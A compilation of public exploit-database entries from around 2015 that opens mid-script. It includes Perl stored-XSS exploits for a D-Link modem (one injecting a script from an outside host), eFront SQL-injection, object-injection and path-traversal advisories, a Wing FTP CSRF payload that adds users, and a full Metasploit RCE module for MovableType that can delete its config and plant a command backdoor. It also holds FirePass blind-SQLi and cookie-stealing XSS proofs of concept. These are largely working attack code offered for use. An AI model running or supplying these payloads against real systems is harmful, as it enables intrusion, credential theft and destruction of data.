$ip = $1 if($ip=~/(.*)\/$/);
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/todmngr.tod?action=set_url&TodUrlAdd=GameOver$payload&port_num=1234";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/todmngr.tod?action=urlview";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 13-02-2015
# Exploit for D-Link DSL-500B G2
# Cross Site Scripting (XSS Injection) Stored in todmngr.tod
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
$ip = $1 if($ip=~/(.*)\/$/);
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/todmngr.tod?action=add&username=$payload&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840";
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting and Exploiting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $url = "$ip/todmngr.tod?action=view";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}
eFront 3.6.15 Multiple SQL Injection Vulnerabilities
[+] Author: Filippo Roncari | Luca De Fulgentis
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that:
1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request.
2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden.
3. The default theme, or others that use the sidebar, must be in use.
[!] PoC URL
-----------------------------
http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1
-----------------------------
The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu.
[!] HTTP Response
-----------------------------
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html
Content-Length: 28786
[...]
<div class = "menuOption" name="lessonSpecific" id="forum_a" > <table>
<tr> <td>
target="mainframe">
<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b"
<img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a>
</td>
<td class = "menuListOption" >
<a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a>
</td> </tr>
</table> </div>
[...]
-----------------------------
For further details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
eFront 3.6.15 PHP Object Injection Vulnerability
[+] Author: Filippo Roncari
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
eFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.
[+] Technical Details
A PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input.
[!] File: libraries/includes/copy.php
-----------------------------
if ($_GET['transfered']) {
$transferedNodesCheck = unserialize($_GET['transfered']);
}
$copiedTests = array();
$copiedUnits = array();
$map = array();
foreach ($nodeOrders as $value) {
list($id, $parentContentId) = explode("-", $value);
if (!in_array($id, $transferedNodesCheck)) {
-----------------------------
The injection affects the "transfered" parameter.
[+] Proof of Concept (PoC)
[!] HTTP Request
-----------------------------
GET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
Cookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e
-----------------------------
A common way to exploit this vulnerability is to find a PHP magic method that can be abused and inject a properly crafted arbitrary object in order to trigger it. Although a deeper analysis has not been performed, no useful PHP magic methods have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferedNodesCheck is exclusively used within an in_array() call, only __wakeup() and __destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE-2014-8142) to create denial of service, leak memory and, under certain conditions, execute code.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
eFront 3.6.15 Path Traversal Vulnerability
[+] Author: Filippo Roncari
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
eFront 3.6.15 is prone to a critical path traversal vulnerability involving the view_file.php module, due to improper user-input sanitization and unsafe inner normalize() function logic. Any unprivilieged attacker could exploit this vulnerability by manipulating HTTP parameter value in order to climb the directories tree and access arbitrary files on the remote file system. This issue can lead to critical confidentiality violations, depending on the privileges assigned to the application server.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.
[+] Proof of Concept (PoC)
[!] PoC URL
-----------------------------
http://target.site/www/view_file.php?action=download&file=/[EFRONT_BASE_PATH]/../../../../../../etc/passwd/
_____________________________
[!] HTTP Request
-----------------------------
GET /test/efront/www/view_file.php?action=download&file=/Applications/MAMP/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1
Host: localhost
Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6;
PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd
-----------------------------
[!] HTTP Response
-----------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:20:43 GMT Content-Description: File Transfer
Content-Disposition: attachment; filename="passwd" Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public
Content-Length: 5253
Content-Type: application/download
##
# User Database #
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory. #
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
[...]
_____________________________
For technical details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
# Exploit Title: Path traversal vulnerability
# Google Dork: intitle:path traversal
# Date: 05-08-2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.sqlbuddy.com
# Software Link: http://www.sqlbuddy.com
# Version: 1.3.3
# Tested on: windows 7
# Category: webapps
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product:
===============================
SQL Buddy is an open source web based MySQL administration application.
Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.
e.g. .doc, .txt, .xml, .conf, .sql etc...
After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.
Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>
POC exploit payloads:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo
Severity Level:
===============
High
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=somefile
Affected Area(s):
[+] Server directories & sensitive files
Solution - Fix & Patch:
=======================
N/A
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.
Domains: hyp3rlinx.altervista.org
# Exploit Title: CSRF add arbitrary users
# Google Dork:
# Date: 2015-04-28
# Exploit Author: John Page (hyp3rlinx)
#Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.wftpserver.com/serverhistory.htm
# Software Link: http://www.wftpserver.com/
# Version: 4.4.5
# Tested on: windows 7
# Category: webapps
Wing FTP Server Admin 4.4.5 - CSRF Vulnerability Add Users
Vendor:
http://www.wftpserver.com/serverhistory.htm
============================================
Release Date:
=============
2015-04-28
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt
Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9
Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports
following protocols FTP, FTPS, HTTPS, SSH
Advisory Information:
==============================
CSRF vulnerability within Wing FTP Server Admin that allows adding
arbitrary users to the system.
Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page (hyp3rlinx)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Request Method(s):
[+] POST
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
=======================
The CSRF vulnerability can be exploited by remote attackers without
privileged application user account and with low user interaction (click).
Payload will add arbitrary users to the system.
POC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF]
POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web
vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.
source: https://www.securityfocus.com/bid/52651/info
WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
WebGlimpse 2.18.7 is vulnerable; other versions may also be affected.
http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'SixApart MovableType Storable Perl Code Execution',
'Description' => %q{
This module exploits a serialization flaw in MovableType before 5.2.12 to execute
arbitrary code. The default nondestructive mode depends on the target server having
the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
The destructive mode of operation uses only required MovableType dependencies,
but it will noticeably corrupt the MovableType installation.
},
'Author' =>
[
'John Lightsey',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-1592' ],
[ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
],
'Privileged' => false, # web server context
'Payload' =>
{
'DisableNops' => true,
'BadChars' => ' ',
'Space' => 1024,
},
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Feb 11 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),
OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
], self.class
)
end
=begin
#!/usr/bin/perl
# generate config parameters for injection checks
use Storable;
{
package XXXCHECKXXX;
sub STORABLE_thaw {
return 1;
}
sub STORABLE_freeze {
return 1;
}
}
my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";
{
package DateTime;
use overload '+' => sub { 'ignored' };
}
=end
def check
vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
}
})
unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test");
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Vulnerable
end
def exploit
if datastore['DESTRUCTIVE'] == true
exploit_destructive
else
exploit_nondestructive
end
end
=begin
#!/usr/bin/perl
# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
use Storable;
{
package Object::MultiType;
use overload '+' => sub { 'ingored' };
}
{
package Object::MultiType::Saver;
}
{
package DateTime;
use overload '+' => sub { 'ingored' };
}
{
package Try::Tiny::ScopeGuard;
}
my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
=end
def exploit_nondestructive
print_status("#{peer} - Using nondestructive attack method")
config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
config_payload << payload.encoded.unpack('H*')[0]
config_payload << "7d293b"
config_payload << "23" * (1025 - payload.encoded.length)
config_payload << "0a657869743b"
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => config_payload
}
}, 5)
end
=begin
#!/usr/bin/perl
# Generate destructive config parameter to unlink mt-config.cgi
use Storable;
{
package CGITempFile;
}
my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";
my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";
=end
def exploit_destructive
print_status("#{peer} - Using destructive attack method")
# First we need to delete mt-config.cgi using the storable injection
print_status("#{peer} - Sending storable injection to unlink mt-config.cgi")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'retry',
'step' => 'configure',
'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
}
})
if res && res.code == 200
print_status("Successfully sent unlink request")
else
fail_with(Failure::Unknown, "Error sending unlink request")
end
# Now we rewrite mt-config.cgi to accept a payload
print_status("#{peer} - Rewriting mt-config.cgi to accept the payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
'vars_get' => {
'__mode' => 'next_step',
'step' => 'optional',
'default_language' => 'en_us',
'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
'set_static_uri_to' => '/',
'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
}
})
if res && res.code == 200
print_status("Successfully sent mt-config rewrite request")
else
fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
end
# Finally send the payload
print_status("#{peer} - Sending payload request")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
'vars_get' => {
'xyzzy' => payload.encoded,
}
}, 5)
end
end
source: https://www.securityfocus.com/bid/52653/info
FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following versions of FirePass are affected:
6.0
6.0.1
6.0.2
6.0.2.3
6.0.3
6.1
7.0
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
source: https://www.securityfocus.com/bid/52661/info
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMSimple 3.3 is vulnerable; other versions may also be affected.
http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the submissions page URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker should add a malicious code to the "URL" field:
"><script>alert(document.cookie)</script>
the XSS will be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]